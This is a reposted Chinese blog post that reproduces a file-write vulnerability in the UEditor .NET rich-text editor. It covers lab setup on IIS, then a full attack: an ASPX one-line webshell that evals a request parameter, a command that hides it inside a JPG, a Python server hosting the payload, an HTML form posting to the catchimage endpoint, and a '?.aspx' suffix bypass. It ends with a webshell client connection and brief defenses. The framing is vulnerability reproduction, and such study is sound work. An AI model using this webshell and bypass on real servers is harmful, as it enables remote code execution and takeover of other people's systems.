一、漏洞描述
UEditor是一款所見(jiàn)即所得的開(kāi)源富文本編輯器,具有輕量、可定制、用戶體驗(yàn)優(yōu)秀等特點(diǎn),被廣大WEB應(yīng)用程序所使用。本次爆出的高危漏洞屬于.NET版本,其它的版本暫時(shí)不受影響。漏洞成因是在抓取遠(yuǎn)程數(shù)據(jù)源的時(shí)候未對(duì)文件后綴名做驗(yàn)證導(dǎo)致任意文件寫入漏洞,黑客利用此漏洞可以在服務(wù)器上執(zhí)行任意指令,綜合評(píng)級(jí)高危。
二、影響范圍
該漏洞影響UEditor的.Net版本,其它語(yǔ)言版本暫時(shí)未受影響。
三、漏洞原理
漏洞的成因是在獲取圖片資源時(shí)僅檢查了Content-Type,導(dǎo)致可以繞過(guò)達(dá)到任意文件上傳。具體的漏洞分析可參考:https://www.freebuf.com/vuls/181814.html
四、漏洞復(fù)現(xiàn)
1、環(huán)境部署
準(zhǔn)備一臺(tái)Windows Server服務(wù)器,我用的是Windows 2008 Server。
沒(méi)有安裝.NET Framework 4.0的要先安裝:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718
安裝完 .NET Framework 4.0 后,還需要向 IIS 注冊(cè)應(yīng)用程序池,注冊(cè)的方法是,使用管理員權(quán)限打開(kāi)命令提示符(CMD),輸入以下命令:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i
安裝完畢后,在 IIS 管理器刷新就能看到 4.0 的應(yīng)用程序池。
https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下載utf8的.net版本
右鍵 網(wǎng)站–添加網(wǎng)站,選擇下載的Ueditor目錄, 選擇版本為 4.0 的應(yīng)用程序池;點(diǎn)擊連接為,設(shè)置特定用戶,該特定用戶為主機(jī)上存在的用戶例如administrator
此時(shí)訪問(wèn)127.0.0.1:8080已經(jīng)有Ueditor的界面了
代碼要求以應(yīng)用程序的形式來(lái)運(yùn)行(可以方便加入庫(kù)依賴和組織代碼)。所以需要把 net 目錄轉(zhuǎn)換為應(yīng)用程序;點(diǎn)擊連接為,設(shè)置特定用戶,該特定用戶為主機(jī)上存在的用戶例如administrator
訪問(wèn)net/controller.ashx 控制器文件,出現(xiàn)以下界面說(shuō)明編輯器應(yīng)用程序運(yùn)行成功,且漏洞存在,到此配置完畢。
如果配置過(guò)程中訪問(wèn)頁(yè)面顯示權(quán)限不夠的報(bào)錯(cuò),那么右鍵部署項(xiàng)目的文件夾,選擇屬性,選擇安全,增加Everyone用戶,將該用戶的權(quán)限設(shè)置為完全控制,點(diǎn)擊確定,重新部署即可。
2、攻擊流程
訪問(wèn)http://ip:port/net/controller.ashx 控制器文件。當(dāng)出現(xiàn)下圖的時(shí)候表示漏洞存在
準(zhǔn)備一個(gè)aspx一句話木馬
<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>
制作圖片馬
copy w01ke.jpg /b + shell.aspx /a ueditor.jpg
準(zhǔn)備一臺(tái)服務(wù)器存放圖片馬或者需要上傳的文件,將做好的ueditor.jpg圖片馬上傳到我們的服務(wù)器,并開(kāi)啟下載服務(wù)(HTTP)
python -m SimpleHTTPServer 8080
制作一個(gè)HTML。因?yàn)椴皇巧蟼髀┒此詄nctype 不需要指定為multipart/form-data。
<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
其中http://xx.com 為需要測(cè)試的網(wǎng)站地址,action后填寫路徑為實(shí)際中遇到的路徑,不要太死板,如果太死板不按網(wǎng)站的實(shí)際路徑來(lái)就會(huì)出現(xiàn)路徑找不到的錯(cuò)誤
打開(kāi)我們做好的HTML,shell addr 處填寫服務(wù)器上圖片馬地址,構(gòu)造成以下格式,繞過(guò)上傳使其解析為 aspx
http://xxxx/ueditor.jpg?.aspx
點(diǎn)擊submit,直接顯示無(wú)效URL
經(jīng)過(guò)排查,發(fā)現(xiàn)不能用Python開(kāi)啟web的方式,貌似只能用域名的形式(我不確定),我只好把我的圖片馬上傳至云服務(wù)器,然后修改訪問(wèn)域名即可成功,同時(shí)回顯了木馬路徑
使用蟻劍連接:
五、防御措施
修改CrawlerHandler.cs 增加對(duì)文件擴(kuò)展名的;
IPS等防御產(chǎn)品可以加入相應(yīng)的特征
————————————————
版權(quán)聲明:本文為CSDN博主「w01ke」的原創(chuàng)文章,遵循CC 4.0 BY-SA版權(quán)協(xié)議,轉(zhuǎn)載請(qǐng)附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/m0_51468027/article/details/126077427
該文章在 2023/10/28 11:15:58 編輯過(guò)
400 186 1886
